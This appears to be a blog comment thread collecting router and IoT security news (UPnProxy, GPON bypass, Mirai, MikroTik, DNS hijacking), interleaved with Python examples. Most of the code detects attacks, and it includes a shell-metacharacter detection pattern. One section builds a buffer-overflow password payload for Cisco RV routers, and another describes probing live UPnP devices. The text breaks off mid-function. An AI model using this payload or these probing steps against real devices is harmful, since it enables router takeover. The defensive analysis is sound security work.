That’s also how the Akamai researchers found the malicious UPnP proxy schemes. Akamai says it found 4.8 million devices on the open internet that would improperly return a certain query related to UPnP. Of those, about 765,000 also had a secondary implementation issue that created a bigger network communication vulnerability. And then on more than 65,000 of those, Akamai saw evidence that attackers had exploited the other weaknesses to inject one or more malicious commands into the router mechanism that controls traffic flow. Those final 65,000 devices were grouped together in various ways and ultimately pointed to 17,599 unique IP addresses for attackers to bounce traffic around to mask their movements.
“In particular it’s annoying to build these attacks against hundreds of personal routers, and testing these attacks is hard too,”
Notably, the Akamai researchers saw evidence that UPnP proxying isn’t just being used for malicious activity. It also seems to be part of efforts to skirt censorship schemes in countries like China to gain unfettered web access.
Users won’t realize if their devices are being exploited for UPnP proxy attacks, and there is little they can do to defend themselves if they have a vulnerable device besides getting a new one. Some devices will allow users to disable UPnP, but that can lead to functionality issues.
Akamai found 73 brands and almost 400 IoT models that are vulnerable in some way.
Internet of Threats
Internet of Things security is still not enough of a priority. A big part of the problem is that every device is a black box: we don’t know what code these things are running, and it’s all proprietary (aka unvetted).
Tomi Engdahl says:
Cisco Switches in Iran, Russia Hacked in Apparent Pro-US Attack
https://www.securityweek.com/cisco-switches-iran-russia-hacked-apparent-pro-us-attack
A significant number of Cisco switches located in Iran and Russia have been hijacked in what appears to be a hacktivist campaign conducted in protest of election-related hacking. However, it’s uncertain if the attacks involve a recently disclosed vulnerability or simply abuse a method that has been known for more than a year.
Tomi Engdahl says:
Multi-Purpose Proxy Botnet Ensnares 65,000 Routers
https://www.securityweek.com/multi-purpose-proxy-botnet-ensnares-65000-routers
More than 65,000 routers exposed to the Internet via the Universal Plug and Play (UPnP) protocol are being abused by cybercriminals as part of a large, multi-purpose proxy botnet, Akamai has discovered.
The vulnerable devices were found to have NAT injections that allow malicious actors to abuse them for various purposes, such as bypassing censorship, spamming and phishing, click fraud, account takeover and credit card fraud, distributed denial of service (DDoS) attacks, malware distribution, and more.
The 65,000 injected devices, Akamai reveals, are part of a larger set of over 4.8 million devices that were found to be vulnerable to simple UDP SSDP (the UDP portion of UPnP) inquiries. Around 765,000 of the devices were also found to expose their vulnerable TCP implementations, the security firm says.
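The discovery and NAT-injection mechanics described in this excerpt and in the WIRED piece above, as an added example that is not code from Akamai or either article: it builds the SSDP M-SEARCH probe (the UDP stage), parses the reply, builds the GetGenericPortMappingEntry call used to walk a WANIPConnection device's port-mapping table (the TCP/SOAP stage), and flags a mapping whose InternalClient is not a LAN host, which is what a UPnProxy injection looks like. The SSDP reply and the SOAP responses are constructed sample data, 203.0.113.10 (a documentation address) stands in for the attacker-chosen proxy target, and the helper names are this example's own.

```python
import ipaddress
import xml.etree.ElementTree as ET

SSDP_HOST, SSDP_PORT = "239.255.255.250", 1900
WANIP_ST = "urn:schemas-upnp-org:service:WANIPConnection:1"
# Explicit RFC 1918 ranges; ipaddress.is_private also covers documentation
# ranges, which would hide the constructed attacker address below.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def build_msearch(st=WANIP_ST, mx=2):
    """SSDP M-SEARCH probe (HTTPU, normally multicast to UDP/1900). A router
    that answers this on its WAN side is one of Akamai's 4.8 million."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_HOST}:{SSDP_PORT}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {st}\r\n\r\n"
    ).encode("ascii")


def parse_ssdp_response(raw):
    """Header dict (lower-cased names) from an SSDP reply; LOCATION is the
    device-description URL the TCP/SOAP stage goes on to fetch."""
    status, _, rest = raw.decode("ascii", "replace").partition("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError("unexpected SSDP status line: " + status)
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def build_get_mapping(index):
    """SOAP body for GetGenericPortMappingEntry; walk index 0, 1, 2, ... until
    the device answers with a SpecifiedArrayIndexInvalid fault."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:GetGenericPortMappingEntry xmlns:u="{WANIP_ST}">'
        f"<NewPortMappingIndex>{index}</NewPortMappingIndex>"
        "</u:GetGenericPortMappingEntry></s:Body></s:Envelope>"
    )


def parse_mapping(xml_text):
    """Collect the New* elements of a GetGenericPortMappingEntry response."""
    fields = {}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]          # strip any namespace
        if tag.startswith("New") and el.text:
            fields[tag] = el.text.strip()
    return fields


def is_nat_injection(mapping):
    """UPnProxy signature: InternalClient is not a LAN host. A legitimate
    AddPortMapping forwards to an RFC 1918 address behind the router; an
    injected one forwards to an arbitrary Internet host."""
    client = ipaddress.ip_address(mapping["NewInternalClient"])
    return not any(client in net for net in LAN_NETS)


def audit_mappings(xml_responses):
    """(ExternalPort, Protocol, 'InternalClient:InternalPort') for every
    injected mapping among a list of SOAP responses."""
    hits = []
    for xml_text in xml_responses:
        m = parse_mapping(xml_text)
        if is_nat_injection(m):
            hits.append((int(m["NewExternalPort"]), m["NewProtocol"],
                         m["NewInternalClient"] + ":" + m["NewInternalPort"]))
    return hits


# --- constructed sample data, not captured from a real device ---
SAMPLE_SSDP_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=120\r\n"
    b"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000001::urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"EXT:\r\n"
    b"SERVER: Example-Router UPnP/1.0\r\n"
    b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\n\r\n"
)


def _mapping_xml(ext_port, proto, int_client, int_port, desc):
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        f'<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP_ST}">'
        "<NewRemoteHost></NewRemoteHost>"
        f"<NewExternalPort>{ext_port}</NewExternalPort><NewProtocol>{proto}</NewProtocol>"
        f"<NewInternalPort>{int_port}</NewInternalPort><NewInternalClient>{int_client}</NewInternalClient>"
        f"<NewEnabled>1</NewEnabled><NewPortMappingDescription>{desc}</NewPortMappingDescription>"
        "<NewLeaseDuration>0</NewLeaseDuration>"
        "</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>"
    )


SAMPLE_LEGIT = _mapping_xml(25565, "TCP", "192.168.1.50", 25565, "game server")
SAMPLE_INJECTED = _mapping_xml(8080, "TCP", "203.0.113.10", 80, "proxy")

if __name__ == "__main__":
    print(parse_ssdp_response(SAMPLE_SSDP_REPLY)["location"])
    print(audit_mappings([SAMPLE_LEGIT, SAMPLE_INJECTED]))
```

Against a live device you would send `build_msearch()` to the router's WAN address on UDP/1900, fetch the LOCATION URL to find the WANIPConnection control URL, and POST `build_get_mapping(i)` to it with a `SOAPAction` header; an empty table is the expected result for a router that is not exposing UPnP to the Internet at all.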
Tomi Engdahl says:
Hackers Target Flaws Affecting a Million Internet-Exposed Routers
https://www.securityweek.com/hackers-target-flaws-affecting-million-internet-exposed-routers
Just a few days after they were disclosed, malicious actors started targeting a couple of flaws affecting routers made by South Korea-based Dasan Networks. There are roughly one million potentially vulnerable devices accessible directly from the Internet.
vpnMentor on Monday disclosed the details of two vulnerabilities in Gigabit-capable Passive Optical Network (GPON) routers made by Dasan and distributed to users by ISPs that provide fiber-optic Internet.
One of the flaws (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface. The second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands.
https://www.securityweek.com/over-million-dasan-routers-vulnerable-remote-hacking
Tomi Engdahl says:
Botnets ‘competing’ to attack vulnerable GPON fiber routers
Vulnerable fiber internet routers now under attack from competing botnet herders.
https://www.zdnet.com/article/botnets-competing-to-attack-vulnerable-gpon-fiber-routers/
Several botnet operators are targeting a popular but vulnerable fiber router, which can be easily hijacked thanks to two authentication bypass and command injection bugs.
ZDNet first reported the bugs last week. In case you missed it: two bugs allowed anyone to bypass the router’s login page and access pages within — simply by adding “?images/” to the end of the web address on any of the router’s configuration pages. With near complete access to the router, an attacker can inject their own commands, running with the highest “root” privileges.
In other words, these routers are prime targets for hijacking by botnet operators.
Now, a new report by China-based security firm Netlab 360 says at least five botnet families have been “competing for territory” to target the devices.
All five botnets — Muhstik, Mirai, Hajime, Satori, and Mettle — have developed exploits to target the fiber routers, but so far none of the botnets have successfully hacked and hijacked the routers.
Tomi Engdahl says:
Mirai botnet adds three new attacks to target IoT devices
https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/
This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.
A new variant of the Mirai botnet has added at least three exploits to its arsenal, which enable it to target additional IoT devices, including routers and DVRs.
The new version of Mirai – a powerful cyberattack tool which took down large swathes of the internet across the US and Europe in late-2016 – has been uncovered by researchers at security company Fortinet, who have dubbed it Wicked after lines in the code.
The original version of Mirai was deployed to launch massive distributed denial-of-service (DDoS) attacks, but has also been modified for other means after its source code was published online, including to turn unpatched IoT devices into cryptocurrency miners and proxy servers for delivering malware.
While the original Mirai uses traditional brute force attacks in an attempt to gain control of IoT devices, Wicked uses known and available exploits in order to do its work. Many of these are old, but the inability of many IoT devices to actually install updates means they haven’t been secured against known exploits.
Vulnerabilities used by Wicked include a Netgear R7000 and R64000 Command Injection (CVE-2016-6277), a CCTV-DVR Remote Code Execution and an Invoker shell in compromised web servers.
Tomi Engdahl says:
DASAN GPON home routers exploits in-the-wild
https://isc.sans.edu/forums/diary/DASAN+GPON+home+routers+exploits+inthewild/23677/
Beginning of May, 2 vulnerabilities with exploits were released for DASAN GPON home routers: CVE-2018-10561 and CVE-2018-10562. The first vulnerability allows unauthenticated access to the Internet facing web interface of the router, the second vulnerability allows command injection.
Tomi Engdahl says:
Attackers Change DNS Settings of DrayTek Routers
https://www.securityweek.com/attackers-change-dns-settings-draytek-routers
Attackers have been targeting a zero-day vulnerability in routers made by DrayTek to change their DNS settings and likely abuse them in future attacks.
The Taiwan-based manufacturer of broadband Customer Premises Equipment (CPE) has already acknowledged the problem and has issued a firmware update to address it.
According to the company, the security vulnerability impacts the web administration feature, allowing for an attacker “to intercept or create an administration session and change settings on your router.”
The altering of DNS settings on routers is likely the initial phase of a larger attack, where users would be redirected to rogue DNS servers and fake websites. Thus, cybercriminals can harvest usernames and passwords, steal sensitive information such as banking credentials, or serve malicious applications to unsuspecting users.
“Shodan shows there are nearly 800,000 Draytek routers worldwide, so the vulnerability provides a big opportunity for malicious redirections which could result in people and businesses losing credentials, data and ultimately money,” Sion Lloyd, Researcher at Nominet, told SecurityWeek in an emailed comment.
Tomi Engdahl says:
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Cyber researchers, Ukraine warn of possible Russian attack
https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Tomi Engdahl says:
Botnets Target Zero-Days in GPON Routers
https://www.securityweek.com/botnets-target-zero-days-gpon-routers
Two unpatched vulnerabilities in Dasan’s Gigabit-capable Passive Optical Network (GPON) routers are being exploited by Internet of Things (IoT) botnets, security researchers warn.
Tracked as CVE-2018-10561 and CVE-2018-10562, the two vulnerabilities were publicly disclosed in early May and impact hundreds of thousands of devices. The flaws can be exploited remotely, providing an attacker with full control of the impacted devices.
According to researchers from Qihoo 360 Netlab, there were five botnets targeting the two GPON vulnerabilities last week, namely Hajime, Mettle, Mirai, Muhstik, and Satori.
Now, the security researchers reveal that an older botnet called TheMoon has joined the GPON party as well.
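The "?images/" authentication-bypass marker described in the Dasan GPON excerpts above (vpnMentor/SecurityWeek, ZDNet, the SANS diary and this Netlab item), as an added detection example that is not code from any of those sources: it parses combined-format web log lines and flags requests that carry the CVE-2018-10561 marker, plus a looser shell-metacharacter heuristic for the command-injection half. The log lines are constructed, /diag.html is a placeholder configuration page rather than a path from the advisories, and the parameter name in the last line is invented for the illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" request line: src, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
SHELL_META = re.compile(r"[;`|&$]")


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_gpon_bypass(target):
    """CVE-2018-10561: '?images/' tacked onto a configuration page URL. A
    genuine image fetch has images/ in the path, never as the query string."""
    return urlsplit(target).query.startswith("images/")


def has_shell_meta(target):
    """Shell metacharacters in the decoded URL: the hallmark of the command
    injection (CVE-2018-10562) that follows the bypass. Heuristic only;
    injected parameters sent in a POST body never reach an access log."""
    return bool(SHELL_META.search(unquote(target)))


def scan(lines):
    """(src, method, target, reasons) for every line that matches a marker."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        reasons = []
        if is_gpon_bypass(rec["target"]):
            reasons.append("gpon-auth-bypass")
        if has_shell_meta(rec["target"]):
            reasons.append("shell-metachar")
        if reasons:
            hits.append((rec["src"], rec["method"], rec["target"], tuple(reasons)))
    return hits


# Constructed log lines (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.9 - - [06/May/2018:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [06/May/2018:10:00:02 +0000] "GET /login.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/May/2018:10:00:03 +0000] "GET /diag.html?images/ HTTP/1.1" 200 2048 "-" "curl/7.58.0"',
    '198.51.100.7 - - [06/May/2018:10:00:04 +0000] "POST /diag.html?images/ HTTP/1.1" 200 0 "-" "curl/7.58.0"',
    '203.0.113.4 - - [06/May/2018:10:00:05 +0000] "GET /diag.html?host=%60id%60 HTTP/1.1" 200 0 "-" "python-requests/2.18"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The first check is deliberately narrow: a query string that begins with `images/` has no legitimate meaning on a router's management interface, so it produces almost no false positives, while the metacharacter check is the one to tune per deployment.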
Tomi Engdahl says:
How insecure is your router?
https://opensource.com/article/18/5/how-insecure-your-router?sc_cid=7016000000127ECAAY
Your router is your first point of contact with the internet. How much is it increasing your risk?
Tomi Engdahl says:
7,500+ MikroTik Routers Are Forwarding Owners’ Traffic to the Attackers, How is Yours?
https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.
More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan result, we logged more than 5,000k devices with open TCP/8291 port, and 1,200k of them were identified as MikroTik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.
The Attacks
CoinHive Mining Code Injection
Socks4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
Tomi Engdahl says:
70+ different types of home routers(all together 100,000+) are being hijacked by GhostDNS
http://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/
Note: We have informed various ISPs on the IoC list, and OVH, ORACLE, Google, Microsoft have taken down the related IPs and some others are working on it (Thanks!)
Background introduction
DNSChanger is not something new and was quite active years ago [1]; we occasionally encounter one every once in a while, but given the impact they have, we normally don’t bother to write any article.
But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.
Furthermore, the above DNSChanger Systems are only part of a larger system that the malware campaign runs. The whole campaign also includes: Phishing Web System, Web Admin System, Rogue DNS System. These four parts work together to perform DNS hijacking function. Here we call the whole campaign GhostDNS.
Currently the campaign mainly focuses on Brazil. We have counted 100k+ infected router IP addresses (87.8% located in Brazil), 70+ router/firmware types have been involved, and 50+ domain names, such as some big banks in Brazil and even Netflix and Citibank.br, have been hijacked to steal the corresponding website login credentials.
Tomi Engdahl says:
A mysterious grey-hat is patching people’s outdated MikroTik routers
https://www.zdnet.com/article/a-mysterious-grey-hat-is-patching-peoples-outdated-mikrotik-routers/
Internet vigilante claims he patched over 100,000 MikroTik routers already.
A Russian-speaking grey-hat hacker is breaking into people’s MikroTik routers and patching devices so they can’t be abused by cryptojackers, botnet herders, or other cyber-criminals, ZDNet has learned.
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
Alexey has not been trying to hide his actions
Tomi Engdahl says:
BCMPUPnP_Hunter: A 100k Botnet Turns Home Routers to Email Spammers
https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/
Since September 2018, 360Netlab Scanmon has detected multiple scan spikes on TCP port 5431, each time the system logged more than 100k scan sources, a pretty large number compared with most other botnets we have covered before.
The interaction between the botnet and the potential target takes multiple steps
The botnet has the following characteristics:
The amount of infection is very large: the number of active scanning IPs in each scan event is about 100,000;
The target of infection is mainly router equipment with the BroadCom UPnP feature enabled;
Self-built proxy network (tcp-proxy): the proxy network is implemented by the attacker, and the proxy currently communicates with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, etc. We highly suspect that the attacker’s intention is to send spam.
Tomi Engdahl says:
New Spam Botnet Likely Infected 400,000 Devices
https://www.securityweek.com/new-spam-botnet-likely-infected-400000-devices
A newly discovered botnet that appears designed to send spam emails likely infected around 400,000 machines to date, 360 Netlab security researchers warn.
Dubbed BCMPUPnP_Hunter, the threat was observed mainly targeting routers that have the BroadCom UPnP feature enabled.
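The "scan spike on TCP port 5431, more than 100k scan sources each time" signal in the two BCMPUPnP_Hunter items above, as an added example that is not 360Netlab's Scanmon code: it buckets connection records into fixed time windows and counts distinct source addresses towards the target port, which is what separates a botnet sweep from one noisy host. The flow records are constructed, in a simple CSV layout of this example's own, and the threshold is a placeholder (a real honeypot or flow collector would sit far above 3).

```python
from collections import defaultdict


def parse_flow(line):
    """'epoch,src,dst,proto,dport' CSV (constructed format) -> dict."""
    ts, src, dst, proto, dport = line.strip().split(",")
    return {"ts": int(ts), "src": src, "dst": dst, "proto": proto, "dport": int(dport)}


def scan_spikes(lines, dport=5431, proto="TCP", window=300, threshold=3):
    """Distinct sources per `window`-second bucket towards dport/proto.
    Buckets at or above `threshold` are returned as (window_start, count),
    oldest first. Counting sources, not packets, is the point: a single
    scanner retrying a thousand times still counts once."""
    sources = defaultdict(set)
    for line in lines:
        f = parse_flow(line)
        if f["proto"] == proto and f["dport"] == dport:
            sources[f["ts"] - f["ts"] % window].add(f["src"])
    return sorted((start, len(srcs)) for start, srcs in sources.items() if len(srcs) >= threshold)


# Constructed flow records (documentation addresses). 1536300000 is a
# multiple of 300, so it opens a bucket; 1536300300 opens the next one.
SAMPLE_FLOWS = [
    "1536300000,198.51.100.1,192.0.2.10,TCP,5431",
    "1536300010,198.51.100.2,192.0.2.10,TCP,5431",
    "1536300020,198.51.100.3,192.0.2.11,TCP,5431",
    "1536300025,198.51.100.3,192.0.2.12,TCP,5431",   # same source again: counted once
    "1536300030,198.51.100.4,192.0.2.10,TCP,5431",
    "1536300040,198.51.100.5,192.0.2.10,TCP,443",    # unrelated traffic
    "1536300050,198.51.100.6,192.0.2.10,UDP,5431",   # wrong protocol
    "1536300310,198.51.100.7,192.0.2.10,TCP,5431",   # lone probe in the next bucket
]

if __name__ == "__main__":
    print(scan_spikes(SAMPLE_FLOWS))
```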
Tomi Engdahl says:
New Exploit Kit “Novidade” Found Targeting Home and SOHO Routers
https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/
We identified a new exploit kit we named Novidade that targets home or small office routers by changing their Domain Name System (DNS) settings via cross-site request forgery (CSRF), enabling attacks on a victim’s mobile device or desktop through web applications they’re authenticated with. Once the DNS setting is changed to that of a malicious server, the attacker can execute a pharming attack, redirecting the targeted website traffic from all devices connected to the same router by resolving targeted domains to the IP address of their server.
The earliest Novidade sample we found was from August 2017, and two different variants were identified since. While one of the variants was involved in the DNSChanger system of a recent GhostDNS campaign, we believe that Novidade is not limited to a single campaign, as the exploit kit was also concurrently being used in different campaigns.
70+ different types of home routers(all together 100,000+) are being hijacked by GhostDNS
https://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/
Tomi Engdahl says:
Flaw Possibly Affecting 500,000 Ubiquiti Devices Exploited in the Wild
https://www.securityweek.com/flaw-possibly-affecting-500000-ubiquity-devices-exploited-wild
Nearly half a million Ubiquiti devices may be affected by a vulnerability that has already been exploited in the wild, security experts warned last week.
Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed last week on Twitter that hackers had been remotely targeting Ubiquiti networking devices exposed via a discovery service accessible on UDP port 10001.
https://twitter.com/troutman/status/1090212243197870081
Tomi Engdahl says:
Did you hear the one about Cisco routers using strcpy insecurely for login authentication? Makes you go AAAAA-AAAAAAArrg *segfault*
RV110W, RV130W, RV215W need patching to close remote hijacking bug
https://www.theregister.co.uk/2019/03/01/cisco_cve_2019_1663_strcpy_login_authentication/
Cisco has patched three of its RV-series routers after Pen Test Partners (PTP) found them using hoary old C function strcpy insecurely in login authentication function. The programming blunder can be exploited to potentially hijack the devices.
PTP looked at how the routers’ web-based control panel handled login attempts by users, and found that it was alarmingly easy to trigger a buffer overflow by simply supplying a long string of characters as the password, something which Cisco admitted “could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device”.
Lobbing in a password of 447 characters, such as ‘A’, followed by four characters, would allow the hijacker to control a subroutine return address on the web app’s stack using the values of those final characters. That means the hacker could force the device’s 32-bit Arm-based processor to jump to malicious code stashed in the login request.
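The workflow that produces a figure like the 447 bytes quoted above, as an added example that is not Pen Test Partners' or The Register's code: a de Bruijn ("cyclic") pattern is sent as the password, the 4 bytes that end up in the saved return address are read back from the crash (PC or LR in the register dump), and their position in the pattern is the offset. The pattern generator is the standard algorithm, the 447 default is the article's figure for these RV routers, and the return-address value passed to build_login_password is a placeholder, not a real gadget or shellcode address.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
_CACHE = {}


def de_bruijn(n=4, alphabet=ALPHABET):
    """De Bruijn sequence B(k, n): every n-byte window occurs exactly once,
    so 4 bytes read out of a clobbered register pin down their offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def extend(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        extend(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            extend(t + 1, t)

    extend(1, 1)
    return bytes(alphabet[i] for i in out)


def _pattern(n):
    if n not in _CACHE:
        _CACHE[n] = de_bruijn(n)
    return _CACHE[n]


def cyclic(length, n=4):
    """First `length` bytes of the pattern: the password for the probe request."""
    pat = _pattern(n)
    if length > len(pat):
        raise ValueError("pattern exhausted; use a larger n")
    return pat[:length]


def cyclic_find(chunk, n=4):
    """Offset of an n-byte window within the pattern, or -1 if absent."""
    return _pattern(n).find(chunk)


def offset_from_pc(pc, n=4):
    """The crash reports PC (or LR) as a 32-bit little-endian value; turn it
    back into the bytes that were copied over the saved return address."""
    return cyclic_find(struct.pack("<I", pc), n)


def build_login_password(ret_addr, offset=447):
    """Layout the article describes: `offset` filler bytes, then the 4
    little-endian bytes that land in the saved return address of the
    32-bit Arm target. 447 is the figure quoted for the RV110W/RV130W/
    RV215W; derive it with offset_from_pc for any other binary. ret_addr
    is a placeholder in this example."""
    return b"A" * offset + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    probe = cyclic(600)
    # Pretend the crash dump showed these four bytes in PC:
    pc = struct.unpack("<I", probe[447:451])[0]
    print(hex(pc), offset_from_pc(pc))
    print(len(build_login_password(0xDEADBEEF)))
```

The uniqueness property is what makes this better than a run of `A`s: with a plain fill you learn only that the return address was overwritten, with the cyclic pattern the register value itself tells you where in the input the overwrite happened.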
Tomi Engdahl says:
Cisco Patches Critical Vulnerability in Wireless Routers
https://www.securityweek.com/cisco-patches-critical-vulnerability-wireless-routers
Cisco released security patches this week to address a Critical vulnerability in several wireless routers that allows an attacker to remotely execute code on the impacted devices.
Tracked as CVE-2019-1663 and featuring a CVSS score of 9.8, the security flaw resides in the web-based management interface of three router models and is created due to improper validation of user-supplied data in the web-based management interface.
“An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user,” Cisco explains in an advisory.
Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Tomi Engdahl says:
MikroTik Firewall & NAT Bypass
Exploitation from WAN to LAN
https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019-3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts.
Tomi Engdahl says:
Hackers have started attacks on Cisco RV110, RV130, and RV215 routers
Attacks started two days after Cisco released patch, one day after researchers published demo exploit code.
https://www.zdnet.com/article/hackers-have-started-attacks-on-cisco-rv110-rv130-and-rv215-routers/
Tomi Engdahl says:
Hacker group has been hijacking DNS traffic on D-Link routers for three months
https://www.zdnet.com/article/hacker-group-has-been-hijacking-dns-traffic-on-d-link-routers-for-three-months/
Other router models have also been targeted, such as ARG, DSLink, Secutech, and TOTOLINK.
For the past three months, a cybercrime group has been hacking into home routers –mostly D-Link models– to change DNS server settings and hijack traffic meant for legitimate sites and redirect it to malicious clones.
The attackers operate by using well-known exploits in router firmware to hack into vulnerable devices and make silent changes to the router’s DNS configuration, changes that most users won’t ever notice.
The point of this router hacking campaign was to inject the IP addresses of rogue DNS servers inside people’s routers.
Tomi Engdahl says:
Ongoing DNS Hijacking Campaign Targets Gmail, PayPal, Netflix Users
https://www.securityweek.com/ongoing-dns-hijacking-campaign-targets-gmail-paypal-netflix-users
A DNS hijacking campaign that has been ongoing for the past three months is targeting the users of popular online services, including Gmail, PayPal, and Netflix.
As part of the campaign, the attackers compromised consumer routers to modify their DNS settings and redirect users to rogue websites to steal their login credentials.
Bad Packets security researchers, who have been following the attacks since December, have identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
“All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169),” the researchers reveal.
The first DNS hijacking exploit targeted D-Link DSL modems such as D-Link DSL-2640B, DSL-2740R, DSL-2780B, and DSL-526B. The rogue DNS server used in this attack was hosted by OVH Canada (IP address 66.70.173.48).
Ongoing DNS hijacking campaign targeting consumer routers
https://badpackets.net/ongoing-dns-hijacking-campaign-targeting-consumer-routers/
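The check a practitioner wants after the D-Link/DSL-modem DNS-hijacking items above (ZDNet, SecurityWeek, Bad Packets), as an added example that is not code from any of them: it reads the resolvers a router hands out, classifies each one against an expected list, the LAN ranges and a rogue-DNS indicator, and compares answers from the configured resolver with answers from a trusted one, which is the pharming symptom the campaign relies on. The only indicator taken from the page is 66.70.173.48; the expected resolvers, the resolv.conf dump and the answer sets are constructed for the example.

```python
import ipaddress

# Indicator quoted in the Bad Packets report above (rogue DNS server at OVH Canada).
KNOWN_ROGUE_DNS = {"66.70.173.48"}
# Placeholder for the ISP's or operator's legitimate resolvers (assumption).
EXPECTED_DNS = {"192.0.2.53", "192.0.2.54"}
# Explicit RFC 1918 ranges; ipaddress.is_private would also swallow the
# documentation ranges used in the sample data.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_resolvers(text):
    """Resolver IPs from resolv.conf-style 'nameserver X' lines, i.e. what a
    DHCP client on the LAN sees after the router's settings were changed."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            out.append(parts[1])
    return out


def classify(ip_str):
    if ip_str in KNOWN_ROGUE_DNS:
        return "known-rogue"
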